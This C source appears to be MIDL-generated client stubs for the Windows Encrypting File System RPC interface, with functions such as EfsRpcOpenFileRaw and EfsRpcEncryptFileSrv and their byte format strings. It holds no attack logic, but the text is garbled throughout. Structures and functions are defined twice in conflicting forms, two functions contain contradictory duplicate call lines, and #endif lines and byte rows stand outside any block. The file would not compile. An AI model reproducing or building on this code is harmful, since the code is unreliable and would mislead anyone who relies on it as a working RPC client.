0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x08, 0x00,
0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
}};
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
}};
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[283];
#elif defined(_M_IX86)
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
SHORT Pad;
UCHAR Format[23];
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[271];
#endif
extern const UCHAR ms2Defsr__MIDL_TypeFormatString[55];
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
SHORT Pad;
UCHAR Format[89];
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, NDR_TSI_20, 0, 0, NULL, 0, 0, 0x00000001};
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)&efsrpc___RpcClientInterface;
RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *)& efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
#pragma optimize("", off)
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
{
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], (unsigned char *) &binding_h).Simple;
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, binding_h, hContext, FileName, Flags).Simple;
}
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 54, hContext, EfsOutPipe).Simple;
}
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 104, hContext, EfsInPipe).Simple;
}
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext)
{
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 154, hContext);
}
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 192, binding_h, FileName).Simple;
}
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 234, binding_h, FileName, OpenFlag).Simple;
}
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00,
0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x08, 0x00,
0x18, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x08, 0x00, 0x26, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,
0x03, 0x00, 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00,
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x18, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01,
0x08, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x0a, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00,
};
#elif defined(_M_IX86)
#pragma optimize("", off)
#pragma warning(push)
#pragma warning(disable:4100)
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, &binding_h).Simple;
}
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 52, &hContext).Simple;
}
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 100, &hContext).Simple;
}
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
{
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[52], (unsigned char *) &hContext);
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 148, &hContext);
}
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 184, &binding_h).Simple;
}
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 224, &binding_h).Simple;
}
#pragma warning(pop)
#pragma optimize("", on)
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00,
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
}};
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
}};
#endif
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0c, 0x00, 0x30, 0x40,
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x04, 0x00, 0x18, 0x00, 0x70, 0x00,
0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0c, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x04, 0x00, 0x26, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x0c, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00,
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x10, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00,
0x0c, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00,
};
#endif
const UCHAR ms2Defsr__MIDL_TypeFormatString[] = {
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x30, 0x41, 0x00, 0x00, 0x11, 0x04, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00,
0x11, 0x00, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
};